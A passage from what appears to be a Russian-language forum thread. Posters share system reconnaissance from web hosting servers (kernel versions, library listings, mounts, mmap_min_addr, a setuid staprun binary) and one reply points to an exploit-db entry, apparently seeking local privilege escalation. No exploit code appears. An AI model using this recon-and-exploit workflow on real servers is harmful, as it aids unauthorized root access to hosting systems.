-rwxr-xr-x. 1 root root 94252 2010-07-03 17:35:09.000000000 +0300 /lib/libcryptsetup.so.1.0.0
-rwxr-xr-x. 1 root root 1528812 2010-08-26 20:33:49.000000000 +0300 /lib/libdb-4.7.so
-rwxr-xr-x. 1 root root 1577412 2010-07-08 09:58:40.000000000 +0300 /lib/libdb-4.8.so
-rwxr-xr-x. 1 root root 1590068 2010-07-07 10:58:12.000000000 +0300 /lib/libdb-5.0.so
-rwxr-xr-x. 1 root root 1644632 2010-08-26 20:33:47.000000000 +0300 /lib/libdb_cxx-4.7.so
lrwxrwxrwx. 1 root root 18 2013-01-17 03:58:46.722000059 +0300 /lib/libdbus-1.so -> libdbus-1.so.3.5.2
lrwxrwxrwx. 1 root root 18 2013-01-17 03:54:45.919000056 +0300 /lib/libdbus-1.so.3 -> libdbus-1.so.3.5.2
-rwxr-xr-x. 1 root root 302820 2011-07-28 21:52:08.000000000 +0300 /lib/libdbus-1.so.3.5.2
-rwxr-xr-x. 1 root root 5276 2011-05-06 17:32:54.000000000 +0300 /lib/libdevmapper-event-lvm2.so.2.02
lrwxrwxrwx. 1 root root 46 2013-01-17 04:00:17.680000059 +0300 /lib/libdevmapper-event-lvm2mirror.so -> device-mapper/libdevmapper-event-lvm2mirror.so
lrwxrwxrwx. 1 root root 48 2013-01-17 04:00:17.681000059 +0300 /lib/libdevmapper-event-lvm2snapshot.so -> device-mapper/libdevmapper-event-lvm2snapshot.so
-rwxr-xr-x. 1 root root 19924 2011-05-06 17:32:55.000000000 +0300 /lib/libdevmapper-event.so.1.02
-rwxr-xr-x. 1 root root 169636 2011-05-06 17:32:55.000000000 +0300 /lib/libdevmapper.so.1.02
-rwxr-xr-x. 1 root root 19776 2011-08-05 14:40:45.000000000 +0300 /lib/libdl-2.13.so
lrwxrwxrwx. 1 root root 13 2013-01-17 03:54:42.459000056 +0300 /lib/libdl.so.2 -> libdl-2.13.so
lrwxrwxrwx. 1 root root 34 2013-01-17 04:00:49.632001137 +0300 /lib/libdmraid-events-isw.so -> libdmraid-events-isw.so.1.0.0.rc16
lrwxrwxrwx. 1 root root 34 2013-01-17 04:00:49.633001117 +0300 /lib/libdmraid-events-isw.so.1 -> libdmraid-events-isw.so.1.0.0.rc16
-rwxr-xr-x. 1 root root 20632 2010-01-21 18:51:41.000000000 +0200 /lib/libdmraid-events-isw.so.1.0.0.rc16
lrwxrwxrwx. 1 root root 23 2013-01-17 04:00:49.635001011 +0300 /lib/libdmraid.so -> libdmraid.so.1.0.0.rc16
lrwxrwxrwx. 1 root root 23 2013-01-17 04:00:49.635001011 +0300 /lib/libdmraid.so.1 -> libdmraid.so.1.0.0.rc16
-rwxr-xr-x. 1 root root 233292 2010-01-21 18:51:41.000000000 +0200 /lib/libdmraid.so.1.0.0.rc16
lrwxrwxrwx. 1 root root 13 2013-01-17 03:55:02.804000068 +0300 /lib/libe2p.so.2 -> libe2p.so.2.3
-rwxr-xr-x. 1 root root 25440 2010-12-08 00:47:20.000000000 +0200 /lib/libe2p.so.2.3
lrwxrwxrwx. 1 root root 17 2013-01-17 03:54:47.975999575 +0300 /lib/libexpat.so.1 -> libexpat.so.1.5.2
-rwxr-xr-x. 1 root root 161872 2010-02-08 23:21:18.000000000 +0200 /lib/libexpat.so.1.5.2
lrwxrwxrwx. 1 root root 16 2013-01-17 03:55:02.806000068 +0300 /lib/libext2fs.so.2 -> libext2fs.so.2.4
-rwxr-xr-x. 1 root root 202280 2010-12-08 00:47:21.000000000 +0200 /lib/libext2fs.so.2.4
-rw-r--r--. 1 root root 478 2011-10-13 01:41:39.000000000 +0300 /lib/libfreebl3.chk
-rwxr-xr-x. 1 root root 299664 2011-10-13 01:41:39.000000000 +0300 /lib/libfreebl3.so
lrwxrwxrwx. 1 root root 16 2013-01-17 03:55:32.302000059 +0300 /lib/libfuse.so.2 -> libfuse.so.2.8.5
-rwxr-xr-x. 1 root root 186736 2011-03-03 11:43:55.000000000 +0200 /lib/libfuse.so.2.8.5
-rwxr-xr-x. 1 root root 114320 2010-09-24 23:09:40.000000000 +0300 /lib/libgcc_s-4.5.1-20100924.so.1
lrwxrwxrwx. 1 root root 28 2013-01-17 03:54:29.346000072 +0300 /lib/libgcc_s.so.1 -> libgcc_s-4.5.1-20100924.so.1
lrwxrwxrwx. 1 root root 19 2013-01-17 03:54:50.893000067 +0300 /lib/libgcrypt.so.11 -> libgcrypt.so.11.5.3
-rwxr-xr-x. 1 root root 505040 2010-02-14 22:35:19.000000000 +0200 /lib/libgcrypt.so.11.5.3
lrwxrwxrwx. 1 root root 22 2013-01-17 03:54:52.025000056 +0300 /lib/libgio-2.0.so.0 -> libgio-2.0.so.0.2600.0
-rwxr-xr-x. 1 root root 1154820 2010-09-30 22:03:12.000000000 +0300 /lib/libgio-2.0.so.0.2600.0
lrwxrwxrwx. 1 root root 23 2013-01-17 03:54:52.106000058 +0300 /lib/libglib-2.0.so.0 -> libglib-2.0.so.0.2600.0
-rwxr-xr-x. 1 root root 1106516 2010-09-30 22:03:11.000000000 +0300 /lib/libglib-2.0.so.0.2600.0
lrwxrwxrwx. 1 root root 26 2013-01-17 03:54:52.186000058 +0300 /lib/libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.2600.0
-rwxr-xr-x. 1 root root 11968 2010-09-30 22:03:11.000000000 +0300 /lib/libgmodule-2.0.so.0.2600.0
lrwxrwxrwx. 1 root root 26 2013-01-17 03:54:52.188000059 +0300 /lib/libgobject-2.0.so.0 -> libgobject-2.0.so.0.2600.0
-rwxr-xr-x. 1 root root 321792 2010-09-30 22:03:12.000000000 +0300 /lib/libgobject-2.0.so.0.2600.0
lrwxrwxrwx. 1 root root 21 2013-01-17 03:54:50.773000083 +0300 /lib/libgpg-error.so.0 -> libgpg-error.so.0.7.0
-rwxr-xr-x. 1 root root 13828 2010-08-10 22:17:01.000000000 +0300 /lib/libgpg-error.so.0.7.0
lrwxrwxrwx. 1 root root 21 2013-01-17 03:54:56.611000058 +0300 /lib/libgssapi_krb5.so.2 -> libgssapi_krb5.so.2.2
-rwxr-xr-x. 1 root root 227872 2011-10-18 21:33:27.000000000 +0300 /lib/libgssapi_krb5.so.2.2
lrwxrwxrwx. 1 root root 16 2013-01-17 03:54:56.630000059 +0300 /lib/libgssrpc.so.4 -> libgssrpc.so.4.1
-rwxr-xr-x. 1 root root 122036 2011-10-18 21:33:27.000000000 +0300 /lib/libgssrpc.so.4.1
lrwxrwxrwx. 1 root root 26 2013-01-17 03:54:52.210000058 +0300 /lib/libgthread-2.0.so.0 -> libgthread-2.0.so.0.2600.0
-rwxr-xr-x. 1 root root 17140 2010-09-30 22:03:12.000000000 +0300 /lib/libgthread-2.0.so.0.2600.0
lrwxrwxrwx. 1 root root 18 2013-01-17 03:55:43.628000044 +0300 /lib/libhandle.so.1 -> libhandle.so.1.0.3
-rwxr-xr-x. 1 root root 11328 2010-05-08 01:13:56.000000000 +0300 /lib/libhandle.so.1.0.3
lrwxrwxrwx. 1 root root 16 2013-01-17 03:54:57.485999985 +0300 /lib/libidn.so.11 -> libidn.so.11.6.1
-rwxr-xr-x. 1 root root 203300 2010-03-29 11:40:41.000000000 +0300 /lib/libidn.so.11.6.1
lrwxrwxrwx. 1 root root 17 2013-01-17 03:55:15.055000056 +0300 /lib/libip4tc.so.0 -> libip4tc.so.0.0.0
-rwxr-xr-x. 1 root root 25652 2010-08-04 17:57:44.000000000 +0300 /lib/libip4tc.so.0.0.0
lrwxrwxrwx. 1 root root 17 2013-01-17 03:55:15.058000059 +0300 /lib/libip6tc.so.0 -> libip6tc.so.0.0.0
-rwxr-xr-x. 1 root root 26600 2010-08-04 17:57:38.000000000 +0300 /lib/libip6tc.so.0.0.0
lrwxrwxrwx. 1 root root 15 2013-01-17 03:55:15.060000057 +0300 /lib/libipq.so.0 -> libipq.so.0.0.0
-rwxr-xr-x. 1 root root 7304 2010-08-04 17:57:38.000000000 +0300 /lib/libipq.so.0.0.0
lrwxrwxrwx. 1 root root 16 2013-01-17 03:55:15.061000055 +0300 /lib/libiptc.so.0 -> libiptc.so.0.0.0
-rwxr-xr-x. 1 root root 2564 2010-08-04 17:57:44.000000000 +0300 /lib/libiptc.so.0.0.0
-rwxr-xr-x. 1 root root 32428 2009-09-01 22:21:11.000000000 +0300 /lib/libiw.so.29
lrwxrwxrwx. 1 root root 18 2013-01-17 03:54:56.640000059 +0300 /lib/libk5crypto.so.3 -> libk5crypto.so.3.1
-rwxr-xr-x. 1 root root 161280 2011-10-18 21:33:27.000000000 +0300 /lib/libk5crypto.so.3.1
-rwxr-xr-x. 1 root root 8224 2009-07-26 19:29:04.000000000 +0300 /lib/libkeyutils-1.2.so
lrwxrwxrwx. 1 root root 18 2013-01-17 03:54:56.461000083 +0300 /lib/libkeyutils.so.1 -> libkeyutils-1.2.so
lrwxrwxrwx. 1 root root 14 2013-01-17 03:54:56.653000054 +0300 /lib/libkrb5.so.3 -> libkrb5.so.3.3
-rwxr-xr-x. 1 root root 858028 2011-10-18 21:33:27.000000000 +0300 /lib/libkrb5.so.3.3
lrwxrwxrwx. 1 root root 21 2013-01-17 03:54:56.714000057 +0300 /lib/libkrb5support.so.0 -> libkrb5support.so.0.1
-rwxr-xr-x. 1 root root 38760 2011-10-18 21:33:27.000000000 +0300 /lib/libkrb5support.so.0.1
-rwxr-xr-x. 1 root root 622836 2011-05-06 17:32:54.000000000 +0300 /lib/liblvm2app.so.2.2
-rwxr-xr-x. 1 root root 861348 2011-05-06 17:32:55.000000000 +0300 /lib/liblvm2cmd.so.2.02
-rwxr-xr-x. 1 root root 202132 2011-08-05 14:40:45.000000000 +0300 /lib/libm-2.13.so
lrwxrwxrwx. 1 root root 12 2013-01-17 03:54:42.474000056 +0300 /lib/libm.so.6 -> libm-2.13.so
lrwxrwxrwx. 1 root root 17 2013-01-17 03:55:43.305000059 +0300 /lib/libmount.so.1 -> libmount.so.1.1.0
-rwxr-xr-x. 1 root root 69868 2011-01-27 21:46:46.000000000 +0200 /lib/libmount.so.1.1.0
-rwxr-xr-x. 1 root root 231336 2010-02-17 01:35:57.000000000 +0200 /lib/libmultipath.so
lrwxrwxrwx. 1 root root 17 2013-01-17 03:54:43.537000058 +0300 /lib/libncurses.so.5 -> libncurses.so.5.7
-rwxr-xr-x. 1 root root 147496 2010-12-13 19:09:19.000000000 +0200 /lib/libncurses.so.5.7
lrwxrwxrwx. 1 root root 18 2013-01-17 03:54:43.550000059 +0300 /lib/libncursesw.so.5 -> libncursesw.so.5.7
-rwxr-xr-x. 1 root root 202428 2010-12-13 19:09:19.000000000 +0200 /lib/libncursesw.so.5.7
lrwxrwxrwx. 1 root root 20 2013-01-17 03:55:50.606000051 +0300 /lib/libnih-dbus.so.1 -> libnih-dbus.so.1.0.0
-rwxr-xr-x. 1 root root 36932 2010-06-25 02:06:29.000000000 +0300 /lib/libnih-dbus.so.1.0.0
lrwxrwxrwx. 1 root root 15 2013-01-17 03:55:50.610000062 +0300 /lib/libnih.so.1 -> libnih.so.1.0.0
-rwxr-xr-x. 1 root root 99564 2010-06-25 02:06:29.000000000 +0300 /lib/libnih.so.1.0.0
lrwxrwxrwx. 1 root root 12 2013-01-17 03:55:01.120000061 +0300 /lib/libnl.so.1 -> libnl.so.1.1
-rwxr-xr-x. 1 root root 338408 2011-03-21 21:52:43.000000000 +0200 /lib/libnl.so.1.1
-rwxr-xr-x. 1 root root 115484 2011-08-05 14:40:48.000000000 +0300 /lib/libnsl-2.13.so
lrwxrwxrwx. 1 root root 14 2013-01-17 03:54:42.482000056 +0300 /lib/libnsl.so.1 -> libnsl-2.13.so
-rwxr-xr-x. 1 root root 240412 2011-05-11 18:01:04.000000000 +0300 /lib/libnspr4.so
-rwxr-xr-x. 1 root root 39888 2011-08-05 14:40:47.000000000 +0300 /lib/libnss_compat-2.13.so
lrwxrwxrwx. 1 root root 21 2013-01-17 03:54:42.485000056 +0300 /lib/libnss_compat.so.2 -> libnss_compat-2.13.so
-rwxr-xr-x. 1 root root 835604 2011-05-18 21:43:53.000000000 +0300 /lib/libnss_db-2.2.3.so
lrwxrwxrwx. 1 root root 18 2013-01-17 03:58:23.727000056 +0300 /lib/libnss_db.so.2 -> libnss_db-2.2.3.so
-rwxr-xr-x. 1 root root 33992 2011-08-05 14:40:45.000000000 +0300 /lib/libnss_dns-2.13.so
lrwxrwxrwx. 1 root root 18 2013-01-17 03:54:42.488000056 +0300 /lib/libnss_dns.so.2 -> libnss_dns-2.13.so
-rwxr-xr-x. 1 root root 54380 2011-08-05 14:40:46.000000000 +0300 /lib/libnss_files-2.13.so
lrwxrwxrwx. 1 root root 20 2013-01-17 03:54:42.492000056 +0300 /lib/libnss_files.so.2 -> libnss_files-2.13.so
-rwxr-xr-x. 1 root root 22144 2011-08-05 14:40:47.000000000 +0300 /lib/libnss_hesiod-2.13.so
lrwxrwxrwx. 1 root root 21 2013-01-17 03:54:42.494000056 +0300 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.13.so
-rwxr-xr-x. 1 root root 49660 2011-08-05 14:40:47.000000000 +0300 /lib/libnss_nis-2.13.so
lrwxrwxrwx. 1 root root 18 2013-01-17 03:54:42.498000056 +0300 /lib/libnss_nis.so.2 -> libnss_nis-2.13.so
-rwxr-xr-x. 1 root root 58616 2011-08-05 14:40:45.000000000 +0300 /lib/libnss_nisplus-2.13.so
lrwxrwxrwx. 1 root root 22 2013-01-17 03:54:42.502000056 +0300 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.13.so
-rwxr-xr-x. 1 root root 18188 2011-08-05 17:36:52.000000000 +0300 /lib/libnss_sss.so.2
-rwxr-xr-x. 1 root root 26396 2011-08-04 13:51:47.000000000 +0300 /lib/libnss_winbind.so.2
-rwxr-xr-x. 1 root root 3349604 2011-08-04 13:51:47.000000000 +0300 /lib/libnss_wins.so.2
lrwxrwxrwx. 1 root root 20 2013-01-17 03:56:33.619000057 +0300 /lib/libntfs-3g.so.81 -> libntfs-3g.so.81.0.0
-rwxr-xr-x. 1 root root 411472 2011-09-12 20:33:10.000000000 +0300 /lib/libntfs-3g.so.81.0.0
lrwxrwxrwx. 1 root root 16 2013-01-17 03:59:49.603000057 +0300 /lib/libpam.so.0 -> libpam.so.0.82.2
-rwxr-xr-x. 1 root root 51544 2010-11-02 14:31:40.000000000 +0200 /lib/libpam.so.0.82.2
lrwxrwxrwx. 1 root root 21 2013-01-17 03:59:49.608000058 +0300 /lib/libpam_misc.so.0 -> libpam_misc.so.0.82.0
-rwxr-xr-x. 1 root root 10820 2010-11-02 14:31:40.000000000 +0200 /lib/libpam_misc.so.0.82.0
lrwxrwxrwx. 1 root root 17 2013-01-17 03:59:49.609000059 +0300 /lib/libpamc.so.0 -> libpamc.so.0.82.1
-rwxr-xr-x. 1 root root 10324 2010-11-02 14:31:40.000000000 +0200 /lib/libpamc.so.0.82.1
lrwxrwxrwx. 1 root root 18 2013-01-17 04:01:17.254000058 +0300 /lib/libparted.so.0 -> libparted.so.0.0.1
-rwxr-xr-x. 1 root root 484700 2011-10-15 01:56:22.000000000 +0300 /lib/libparted.so.0.0.1
lrwxrwxrwx. 1 root root 15 2013-01-17 03:55:15.932000064 +0300 /lib/libpci.so.3 -> libpci.so.3.1.7
-rwxr-xr-x. 1 root root 48996 2011-01-18 16:34:46.000000000 +0200 /lib/libpci.so.3.1.7
lrwxrwxrwx. 1 root root 16 2013-01-17 03:54:54.464000067 +0300 /lib/libpcre.so.0 -> libpcre.so.0.0.1
-rwxr-xr-x. 1 root root 233144 2011-05-09 16:03:30.000000000 +0300 /lib/libpcre.so.0.0.1
-rwxr-xr-x. 1 root root 16676 2011-05-11 18:01:04.000000000 +0300 /lib/libplc4.so
-rwxr-xr-x. 1 root root 12196 2011-05-11 18:01:04.000000000 +0300 /lib/libplds4.so
lrwxrwxrwx. 1 root root 27 2013-01-17 03:55:17.161000062 +0300 /lib/libply-splash-core.so.2 -> libply-splash-core.so.2.0.0
-rwxr-xr-x. 1 root root 72356 2010-12-07 19:50:20.000000000 +0200 /lib/libply-splash-core.so.2.0.0
lrwxrwxrwx. 1 root root 15 2013-01-17 03:55:17.167000058 +0300 /lib/libply.so.2 -> libply.so.2.0.0
-rwxr-xr-x. 1 root root 89896 2010-12-07 19:50:21.000000000 +0200 /lib/libply.so.2.0.0
lrwxrwxrwx. 1 root root 16 2013-01-17 03:54:47.451999867 +0300 /lib/libpopt.so.0 -> libpopt.so.0.0.0
-rwxr-xr-x. 1 root root 35128 2010-03-28 18:52:06.000000000 +0300 /lib/libpopt.so.0.0.0
-rwxr-xr-x. 1 root root 58104 2011-01-18 16:39:19.000000000 +0200 /lib/libproc-3.2.8.so
-rwxr-xr-x. 1 root root 133344 2011-08-05 14:40:45.000000000 +0300 /lib/libpthread-2.13.so
lrwxrwxrwx. 1 root root 18 2013-01-17 03:54:42.511000056 +0300 /lib/libpthread.so.0 -> libpthread-2.13.so
lrwxrwxrwx. 1 root root 18 2013-01-17 03:56:31.834000138 +0300 /lib/libreadline.so.5 -> libreadline.so.5.2
-rwxr-xr-x. 1 root root 225284 2009-07-25 06:41:35.000000000 +0300 /lib/libreadline.so.5.2
lrwxrwxrwx. 1 root root 18 2013-01-17 03:54:48.843000226 +0300 /lib/libreadline.so.6 -> libreadline.so.6.1
-rwxr-xr-x. 1 root root 239360 2010-02-17 22:22:15.000000000 +0200 /lib/libreadline.so.6.1
-rwxr-xr-x. 1 root root 105200 2011-08-05 14:40:47.000000000 +0300 /lib/libresolv-2.13.so
lrwxrwxrwx. 1 root root 17 2013-01-17 03:54:42.520000056 +0300 /lib/libresolv.so.2 -> libresolv-2.13.so
-rwxr-xr-x. 1 root root 41700 2011-08-05 14:40:45.000000000 +0300 /lib/librt-2.13.so
lrwxrwxrwx. 1 root root 13 2013-01-17 03:54:42.523000056 +0300 /lib/librt.so.1 -> librt-2.13.so
-rwxr-xr-x. 1 root root 122424 2010-09-30 09:04:12.000000000 +0300 /lib/libselinux.so.1
-rwxr-xr-x. 1 root root 245836 2010-06-17 10:42:28.000000000 +0300 /lib/libsepol.so.1
lrwxrwxrwx. 1 root root 12 2013-01-17 03:55:27.834000046 +0300 /lib/libss.so.2 -> libss.so.2.0
-rwxr-xr-x. 1 root root 21740 2010-12-08 00:47:20.000000000 +0200 /lib/libss.so.2.0
lrwxrwxrwx. 1 root root 17 2013-01-17 03:56:36.694000079 +0300 /lib/libsysfs.so.2 -> libsysfs.so.2.0.1
-rwxr-xr-x. 1 root root 47376 2010-06-18 12:00:09.000000000 +0300 /lib/libsysfs.so.2.0.1
-rwxr-xr-x. 1 root root 31648 2011-08-05 14:40:49.000000000 +0300 /lib/libthread_db-1.0.so
lrwxrwxrwx. 1 root root 19 2013-01-17 03:54:42.525000056 +0300 /lib/libthread_db.so.1 -> libthread_db-1.0.so
lrwxrwxrwx. 1 root root 15 2013-01-17 03:54:43.563000055 +0300 /lib/libtinfo.so.5 -> libtinfo.so.5.7
-rwxr-xr-x. 1 root root 125880 2010-12-13 19:09:19.000000000 +0200 /lib/libtinfo.so.5.7
lrwxrwxrwx. 1 root root 16 2013-01-17 03:54:51.021000156 +0300 /lib/libudev.so.0 -> libudev.so.0.9.1
-rwxr-xr-x. 1 root root 59372 2011-08-29 17:31:15.000000000 +0300 /lib/libudev.so.0.9.1
lrwxrwxrwx. 1 root root 20 2013-01-17 03:55:32.316000055 +0300 /lib/libulockmgr.so.1 -> libulockmgr.so.1.0.1
-rwxr-xr-x. 1 root root 8416 2011-03-03 11:43:55.000000000 +0200 /lib/libulockmgr.so.1.0.1
-rwxr-xr-x. 1 root root 14608 2011-08-05 14:40:46.000000000 +0300 /lib/libutil-2.13.so
lrwxrwxrwx. 1 root root 15 2013-01-17 03:54:42.527000056 +0300 /lib/libutil.so.1 -> libutil-2.13.so
lrwxrwxrwx. 1 root root 16 2013-01-17 03:54:49.491000059 +0300 /lib/libuuid.so.1 -> libuuid.so.1.3.0
-rwxr-xr-x. 1 root root 16684 2011-01-27 21:46:47.000000000 +0200 /lib/libuuid.so.1.3.0
lrwxrwxrwx. 1 root root 16 2013-01-17 03:54:49.394000074 +0300 /lib/libwrap.so.0 -> libwrap.so.0.7.6
-rwxr-xr-x. 1 root root 37080 2010-06-16 15:57:00.000000000 +0300 /lib/libwrap.so.0.7.6
lrwxrwxrwx. 1 root root 19 2013-01-17 03:55:15.062000055 +0300 /lib/libxtables.so.5 -> libxtables.so.5.0.0
-rwxr-xr-x. 1 root root 29528 2010-08-04 17:57:45.000000000 +0300 /lib/libxtables.so.5.0.0
lrwxrwxrwx. 1 root root 13 2013-01-17 03:54:45.653000007 +0300 /lib/libz.so.1 -> libz.so.1.2.5
-rwxr-xr-x. 1 root root 84848 2010-06-17 09:42:02.000000000 +0300 /lib/libz.so.1.2.5

mount
/dev/sda3 on / type ext4 (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
tmpfs on /dev/shm type tmpfs (rw)
/dev/sda2 on /BACKUP type ext4 (rw)
/dev/sda1 on /boot type ext4 (rw)
/dev/sda4 on /wwwusers type ext4 (rw)
/dev/sdb1 on /DB type ext4 (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)

df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda3 49G 5.3G 41G 12% /
tmpfs 4.0G 88K 4.0G 1% /dev/shm
/dev/sda2 577G 26G 522G 5% /BACKUP
/dev/sda1 291M 35M 242M 13% /boot
/dev/sda4 917G 207G 664G 24% /wwwusers
/dev/sdb1 60G 2.3G 54G 5% /DB

cat /etc/issue
Fedora release 14 (Laughlin)
Kernel \r on an \m (\l)

cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed

cat /proc/version
Linux version 2.6.35.14-106.fc14.i686.PAE (mockbuild@x86-01.phx2.fedoraproject.org) (gcc version 4.5.1 20100924 (Red Hat 4.5.1-4) (GCC) ) #1 SMP Wed Nov 23 13:39:51 UTC 2011

cat /proc/sys/vm/mmap_min_addr
4096

pwd
/wwwusers/xxxx.xxxx.xx/htdocs/assets/files

ls -la /usr/bin/staprun
---s--x---. 1 root stapusr 149456 Aug 3 2011 /usr/bin/staprun

YaBtr

10.11.2014, 12:49

N@b$ter, пробуйте http://www.exploit-db.com/exploits/21323/

Br@!ns

11.11.2014, 17:41

HTML:
$ uname -a
Linux hosting3 2.6.32-5-amd64 #1 SMP Fri Sep 9 20:23:16 UTC 2011 x86_64 GNU/Linux
$ ls -la /boot
total 13156
drwxr-xr-x 3 root root 4096 Sep 30 2011 .
drwxr-xr-x 22 root root 4096 Jul 9 09:50 ..
-rw-r--r-- 1 root root 1662623 Sep 10 2011 System.map-2.6.32-5-amd64
-rw-r--r-- 1 root root 106153 Sep 10 2011 config-2.6.32-5-amd64
drwxr-xr-x 3 root root 4096 Sep 30 2011 grub
-rw-r--r-- 1 root root 9238156 Sep 30 2011 initrd.img-2.6.32-5-amd64
-rw-r--r-- 1 root root 2419200 Sep 10 2011 vmlinuz-2.6.32-5-amd64
$ ls -la --full-time /lib/lib*
-rw-r--r-- 1 root root 6264 2012-02-12 22:12:38.000000000 +0300 /lib/libBrokenLocale-2.11.3.so
lrwxrwxrwx 1 root root 25 2012-03-15 15:31:59.000000000 +0300 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.11.3.so
-rw-r--r-- 1 root root 18680 2012-02-12 22:12:38.000000000 +0300 /lib/libSegFault.so
lrwxrwxrwx 1 root root 15 2011-09-09 14:41:33.000000000 +0300 /lib/libacl.so.1 -> libacl.so.1.1.0
-rw-r--r-- 1 root root 30408 2010-09-21 10:38:59.000000000 +0300 /lib/libacl.so.1.1.0
-rw-r--r-- 1 root root 14920 2012-02-12 22:12:38.000000000 +0300 /lib/libanl-2.11.3.so
lrwxrwxrwx 1 root root 16 2012-03-15 15:31:59.000000000 +0300 /lib/libanl.so.1 -> libanl-2.11.3.so
lrwxrwxrwx 1 root root 16 2011-09-09 14:41:33.000000000 +0300 /lib/libattr.so.1 -> libattr.so.1.1.0
-rw-r--r-- 1 root root 17608 2010-06-08 08:47:32.000000000 +0300 /lib/libattr.so.1.1.0
lrwxrwxrwx 1 root root 17 2013-02-25 15:50:14.000000000 +0300 /lib/libaudit.so.0 -> libaudit.so.0.0.0
-rw-r--r-- 1 root root 104808 2010-06-18 17:24:53.000000000 +0300 /lib/libaudit.so.0.0.0
lrwxrwxrwx 1 root root 19 2013-02-25 15:50:14.000000000 +0300 /lib/libauparse.so.0 -> libauparse.so.0.0.0
-rw-r--r-- 1 root root 55760 2010-06-18 17:24:53.000000000 +0300 /lib/libauparse.so.0.0.0
lrwxrwxrwx 1 root root 17 2011-09-09 14:41:39.000000000 +0300 /lib/libblkid.so.1 -> libblkid.so.1.1.0
-rw-r--r-- 1 root root 128256 2011-01-25 22:17:01.000000000 +0300 /lib/libblkid.so.1.1.0
lrwxrwxrwx 1 root root 15 2011-09-09 14:48:21.000000000 +0300 /lib/libbsd.so.0 -> libbsd.so.0.2.0
-rw-r--r-- 1 root root 40104 2010-01-11 17:49:56.000000000 +0300 /lib/libbsd.so.0.2.0
lrwxrwxrwx 1 root root 15 2012-10-18 11:55:31.000000000 +0300 /lib/libbz2.so.1 -> libbz2.so.1.0.4
lrwxrwxrwx 1 root root 15 2012-10-18 11:55:31.000000000 +0300 /lib/libbz2.so.1.0 -> libbz2.so.1.0.4
-rw-r--r-- 1 root root 66944 2011-12-26 16:01:14.000000000 +0300 /lib/libbz2.so.1.0.4
-rwxr-xr-x 1 root root 1437064 2012-02-12 22:12:38.000000000 +0300 /lib/libc-2.11.3.so
lrwxrwxrwx 1 root root 14 2012-03-15 15:31:59.000000000 +0300 /lib/libc.so.6 -> libc-2.11.3.so
lrwxrwxrwx 1 root root 14 2011-09-09 14:48:16.000000000 +0300 /lib/libcap.so.2 -> libcap.so.2.19
-rw-r--r-- 1 root root 16640 2010-08-17 00:17:36.000000000 +0300 /lib/libcap.so.2.19
-rw-r--r-- 1 root root 190840 2012-02-12 22:12:39.000000000 +0300 /lib/libcidn-2.11.3.so
lrwxrwxrwx 1 root root 17 2012-03-15 15:31:59.000000000 +0300 /lib/libcidn.so.1 -> libcidn-2.11.3.so
lrwxrwxrwx 1 root root 17 2011-09-09 14:41:39.000000000 +0300 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 12336 2011-06-20 05:54:17.000000000 +0300 /lib/libcom_err.so.2.1
-rw-r--r-- 1 root root 35104 2012-02-12 22:12:38.000000000 +0300 /lib/libcrypt-2.11.3.so
lrwxrwxrwx 1 root root 18 2012-03-15 15:31:59.000000000 +0300 /lib/libcrypt.so.1 -> libcrypt-2.11.3.so
lrwxrwxrwx 1 root root 18 2012-03-15 15:33:52.000000000 +0300 /lib/libdbus-1.so.3 -> libdbus-1.so.3.4.0
-rw-r--r-- 1 root root 261656 2011-06-14 23:40:36.000000000 +0300 /lib/libdbus-1.so.3.4.0
-rw-r--r-- 1 root root 139736 2011-01-23 20:36:59.000000000 +0300 /lib/libdevmapper.so.1.02.1
-rw-r--r-- 1 root root 14696 2012-02-12 22:12:39.000000000 +0300 /lib/libdl-2.11.3.so
lrwxrwxrwx 1 root root 15 2012-03-15 15:31:59.000000000 +0300 /lib/libdl.so.2 -> libdl-2.11.3.so
lrwxrwxrwx 1 root root 13 2011-09-09 14:41:40.000000000 +0300 /lib/libe2p.so.2 -> libe2p.so.2.3
-rw-r--r-- 1 root root 28680 2011-06-20 05:54:18.000000000 +0300 /lib/libe2p.so.2.3
lrwxrwxrwx 1 root root 16 2011-09-09 14:41:40.000000000 +0300 /lib/libext2fs.so.2 -> libext2fs.so.2.4
-rw-r--r-- 1 root root 190000 2011-06-20 05:54:18.000000000 +0300 /lib/libext2fs.so.2.4
-rw-r--r-- 1 root root 90504 2010-11-15 05:02:27.000000000 +0300 /lib/libgcc_s.so.1
lrwxrwxrwx 1 root root 23 2012-05-29 16:12:21.000000000 +0300 /lib/libglib-2.0.so.0 -> libglib-2.0.so.0.2400.2
-rw-r--r-- 1 root root 900200 2010-09-08 22:02:05.000000000 +0300 /lib/libglib-2.0.so.0.2400.2
lrwxrwxrwx 1 root root 17 2011-09-09 14:48:16.000000000 +0300 /lib/libhistory.so.5 -> libhistory.so.5.2
-rw-r--r-- 1 root root 32920 2009-11-02 04:59:32.000000000 +0300 /lib/libhistory.so.5.2
lrwxrwxrwx 1 root root 17 2011-09-09 14:41:51.000000000 +0300 /lib/libhistory.so.6 -> libhistory.so.6.1
-rw-r--r-- 1 root root 33784 2010-05-30 22:09:22.000000000 +0300 /lib/libhistory.so.6.1
lrwxrwxrwx 1 root root 17 2011-09-09 14:41:54.000000000 +0300 /lib/libip4tc.so.0 -> libip4tc.so.0.0.0
-rw-r--r-- 1 root root 25560 2010-07-17 00:17:27.000000000 +0300 /lib/libip4tc.so.0.0.0
lrwxrwxrwx 1 root root 17 2011-09-09 14:41:54.000000000 +0300 /lib/libip6tc.so.0 -> libip6tc.so.0.0.0
-rw-r--r-- 1 root root 28096 2010-07-17 00:17:27.000000000 +0300 /lib/libip6tc.so.0.0.0
